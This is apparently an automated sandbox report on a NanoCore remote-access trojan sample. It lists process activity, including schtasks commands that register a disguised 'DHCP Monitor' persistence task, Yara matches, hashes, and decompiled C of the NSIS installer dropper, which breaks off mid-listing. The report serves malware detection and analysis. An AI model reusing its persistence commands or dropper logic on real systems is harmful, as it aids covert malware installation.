File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: NanoCore, Description: unknown, Source: 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 4320 Parent PID: 3332

General

Start time:	19:40:57
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA63C.tmp'
Imagebase:	0xbb0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5416 Parent PID: 4320

General

Start time:	19:40:57
Start date:	11/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 5840 Parent PID: 3332

General

Start time:	19:40:58
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpA9C7.tmp'
Imagebase:	0xbb0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 5868 Parent PID: 904

General

Start time:	19:40:58
Start date:	11/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
Imagebase:	0xbd0000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 5880 Parent PID: 5840

General

Start time:	19:40:58
Start date:	11/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5872 Parent PID: 5868

General

Start time:	19:40:58
Start date:	11/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff797770000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 4440 Parent PID: 904

General

Start time:	19:41:00
Start date:	11/05/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Imagebase:	0x740000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 4684 Parent PID: 4440

General

Start time:	19:41:01
Start date:	11/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6140 Parent PID: 3472

General

Start time:	19:41:05
Start date:	11/05/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0x840000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 5876 Parent PID: 6140

General

Start time:	19:41:06
Start date:	11/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SYT09009.exe PID: 4956 Parent PID: 5720 SYT09009.exeCOMMON

Executed Functions

Function 00403348, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t119 = E00406500(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E00406492(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
				E004060F7("Kibris Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\alfons\\Desktop\\SYT09009.exe\" ";
				E004060F7(_t160, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\alfons\\Desktop\\SYT09009.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157); // executed
										_t59 = E00403317(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403830();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t63 =  *0x42f4ec;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406500(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t153 = E00405ABA(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E0040577E(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t162);
														}
														E004060F7(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\SYT09009.exe", 0x429450, 1) != 0) {
																E00405ED6(_t137, 0x429450, 0);
																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t94 = E00405796(0x429450);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405ED6(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405B7D(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403317(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403317(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403358
0x0040335c
0x00403364
0x00403368
0x0040336d
0x00403379
0x00403382
0x00403387
0x0040338a
0x00403391
0x00403398
0x00403398
0x00403391
0x0040339a
0x0040339f
0x004033a0
0x004033ac
0x004033b0
0x004033b6
0x004033c4
0x004033c9
0x004033d0
0x004033d4
0x004033d8
0x004033da
0x004033da
0x004033d8
0x004033e2
0x004033e9
0x004033ef
0x00403405
0x00403415
0x0040341a
0x00403420
0x00403427
0x00403433
0x0040343d
0x0040343f
0x00403441
0x00403446
0x00403446
0x00403456
0x0040345c
0x00403525
0x00403525
0x00403527
0x00403529
0x00000000
0x00000000
0x00403465
0x00403468
0x00403470
0x00403470
0x00403473
0x00403478
0x0040347a
0x0040347a
0x0040347b
0x0040347b
0x00403480
0x00403483
0x00403515
0x0040351a
0x0040351f
0x00403522
0x00403524
0x00403524
0x00403524
0x00000000
0x00403489
0x00403489
0x0040348a
0x0040348d
0x004034a5
0x004034d0
0x004034d2
0x004034e5
0x00403510
0x00403513
0x00403531
0x00403534
0x0040353d
0x00403542
0x00403548
0x00403553
0x00403555
0x0040355a
0x0040355c
0x004035b4
0x004035b9
0x004035c3
0x004035ca
0x004035ce
0x00403662
0x00403662
0x00403667
0x0040366d
0x00403672
0x00403796
0x0040379c
0x00403818
0x00403818
0x0040381d
0x00403820
0x00403822
0x00403822
0x0040382a
0x0040382a
0x004037ac
0x004037b4
0x004037b6
0x004037b7
0x004037c4
0x004037d7
0x004037df
0x004037e3
0x004037e3
0x004037eb
0x004037f0
0x004037f7
0x00403805
0x00403807
0x0040380d
0x0040380f
0x00000000
0x00000000
0x00000000
0x004037f9
0x004037ff
0x00403801
0x00403803
0x00403811
0x00403813
0x00000000
0x00403813
0x00000000
0x00403803
0x004037f7
0x00403681
0x00403688
0x00403688
0x004035da
0x00403652
0x00403652
0x0040365e
0x00000000
0x0040365e
0x004035e3
0x004035e7
0x0040361d
0x0040361d
0x0040361f
0x00403627
0x00403699
0x0040369b
0x004036a2
0x004036aa
0x004036aa
0x004036b5
0x004036ba
0x004036c9
0x004036cd
0x004036ce
0x004036d7
0x004036d0
0x004036d0
0x004036d0
0x004036dd
0x004036e3
0x004036e9
0x004036f1
0x004036f1
0x004036ff
0x00403704
0x00403716
0x0040371e
0x00403724
0x00403730
0x00403736
0x00403740
0x00403756
0x00403767
0x0040376d
0x00403774
0x00403777
0x0040377d
0x0040377d
0x00403774
0x00403781
0x00403787
0x00403787
0x0040378c
0x0040378c
0x00000000
0x004036c9
0x00403629
0x0040362b
0x00403636
0x00000000
0x00000000
0x0040363e
0x00403649
0x0040364e
0x00000000
0x0040364e
0x00403612
0x00403614
0x00403618
0x0040361b
0x00000000
0x00000000
0x00000000
0x0040361b
0x00000000
0x00403614
0x00403564
0x00403570
0x00403575
0x0040357a
0x0040357c
0x00000000
0x00000000
0x00403584
0x0040358c
0x0040359d
0x004035a5
0x004035a7
0x004035ac
0x004035ae
0x00000000
0x00000000
0x00000000
0x004035ae
0x00000000
0x00403513
0x004034d4
0x004034d7
0x004034da
0x004034e0
0x004034e0
0x004034e0
0x004034e0
0x00000000
0x004034e0
0x004034dc
0x004034de
0x00000000
0x00000000
0x00000000
0x004034de
0x0040348f
0x00403492
0x00403495
0x0040349b
0x0040349b
0x00000000
0x0040349b
0x00403497
0x00403499
0x00000000
0x00000000
0x00000000
0x00403499
0x00000000
0x00000000
0x00000000
0x0040346a
0x0040346a
0x0040346a
0x0040346b
0x0040346b
0x00000000
0x0040346a
0x00000000

APIs

SetErrorMode.KERNEL32 ref: 0040336D
GetVersion.KERNEL32 ref: 00403373
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
OleInitialize.OLE32(00000000), ref: 004033E9
SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
GetCommandLineA.KERNEL32(Kibris Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\SYT09009.exe" ,00000020,"C:\Users\user\Desktop\SYT09009.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
DeleteFileA.KERNEL32(1033,?,00000007,00000009,0000000B), ref: 004035B9

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNEL32(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SYT09009.exe" ,00000000), ref: 00403924
Part of subcall function 0040390A: lstrlenA.KERNEL32(KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(KXCJDFJSKF), ref: 00403A18
Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E

Part of subcall function 00403830: CloseHandle.KERNEL32(000002C0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
ExitProcess.KERNEL32 ref: 00403688
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
ExitWindowsEx.USER32 ref: 00403807
ExitProcess.KERNEL32 ref: 0040382A

Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E

Strings

UXTHEME, xrefs: 0040339A, 0040339F, 004033A5
1033, xrefs: 004035B4
Kibris Setup, xrefs: 00403410
C:\Users\user\Desktop, xrefs: 004036BA, 004036BF, 004036EB
", xrefs: 0040347B
SeShutdownPrivilege, xrefs: 004037BE
C:\Users\user\AppData\Local\Temp, xrefs: 00403644
C:\Users\user\AppData\Local\Temp, xrefs: 00403538, 00403639, 004036E3, 004036EC
~nsu, xrefs: 00403693
C:\Users\user\Desktop\SYT09009.exe, xrefs: 00403745
TMP, xrefs: 004035A0
C:\Users\user\AppData\Local\Temp\, xrefs: 00403548, 0040354D, 00403563, 0040356F, 0040357E, 0040358B, 00403597, 0040359F, 00403698, 004036A9, 004036B4, 004036C0, 004036CD, 004036DC, 0040378B
Error launching installer, xrefs: 0040361F
.tmp, xrefs: 004036AF
\Temp, xrefs: 0040356A
Low, xrefs: 00403586
TEMP, xrefs: 00403598
NSIS Error, xrefs: 0040340B
"C:\Users\user\Desktop\SYT09009.exe" , xrefs: 00403420, 00403426, 004035DD

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\SYT09009.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SYT09009.exe$Error launching installer$Kibris Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1314998376-198781077
Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

Uniqueness

Uniqueness Score: -1.00%

Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004058c9
0x004058ce
0x004058d7
0x004058da
0x004058e2
0x004058e5
0x004058e8
0x004058f0
0x004058f2
0x004058f3
0x00000000
0x004058f3
0x004058fe
0x00405901
0x00405901
